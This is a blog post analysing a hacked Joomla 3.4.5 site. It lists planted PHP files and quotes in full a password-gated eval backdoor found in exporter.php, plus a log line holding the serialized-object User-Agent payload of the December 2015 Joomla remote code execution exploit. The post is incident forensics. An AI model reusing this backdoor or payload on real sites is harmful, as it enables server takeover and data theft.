Joomla CMS 3.4.5 hacked through RCE vulnerability

Written by - 1 comments

Published on January 4th 2016 - Listed in Hacks Internet


Got a request to investigate a hack on a website using Joomla CMS. Without having more information about the nature of the hack, I started to look for recently modified files and found a couple of them with interesting filenames:

-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/images/sampledata/fruitshop/sql_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/components/com_users/cache_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/components/com_search/views/search/cache_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/modules/mod_footer/sql_952.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/images/sampledata/fruitshop/sql_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/plugins/finder/categories/old_95.php

These files all contained some garbled/encoded PHP coding, typically uploaded and used by hackers. Another very interesting find was this one:

-rw-r--r-- 1 www-data www-data 237 Dec 15 04:25 ./example.com/libraries/joomla/exporter.php

tail ./example.com/libraries/joomla/exporter.php
<?php if (md5($_POST['password']) == 'ee536041e2d1cab06fb46129549f13d2') { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST['code'] . "'\051\051\073", ''); } ?>

Interestingly this file was uploaded a couple of days before all the others so I decided to focus on it. The access_log revealed an interesting GET followed by POST:

88.198.56.140 - - [15/Dec/2015:04:24:25 +0100] "GET / HTTP/1.1" 503 4430 "http://example.com/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
46.165.230.5 - - [15/Dec/2015:04:25:00 +0100] "POST / HTTP/1.1" 503 4462 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36"

Although the return code was 503, the hack still seems to have worked. And even more interesting is the fact, that the POST happened on Joomla itself, not a somewhere already uploaded file. A quick research revealed, that there is a vulnerability in all Joomla versions to remotely execute code (Remote Code Execution, RCE). An exploit for this vulnerability was published on December 15th 2015 (see https://www.exploit-db.com/exploits/38977/), the same day as the hack happened on this Joomla CMS. The vulnerability was fixed in Joomla 3.4.6, which was released a day prior to the hack - yet the CMS owner didn't react as fast and one day later it was already too late. 


Add a comment

Show form to leave a comment

Comments (newest first)

Zbigniew from PL wrote on May 16th, 2016:

Hello, great found, on my clietn site via this file hacker upload also a ORB shell to BqZeR.php in domain root and few other places.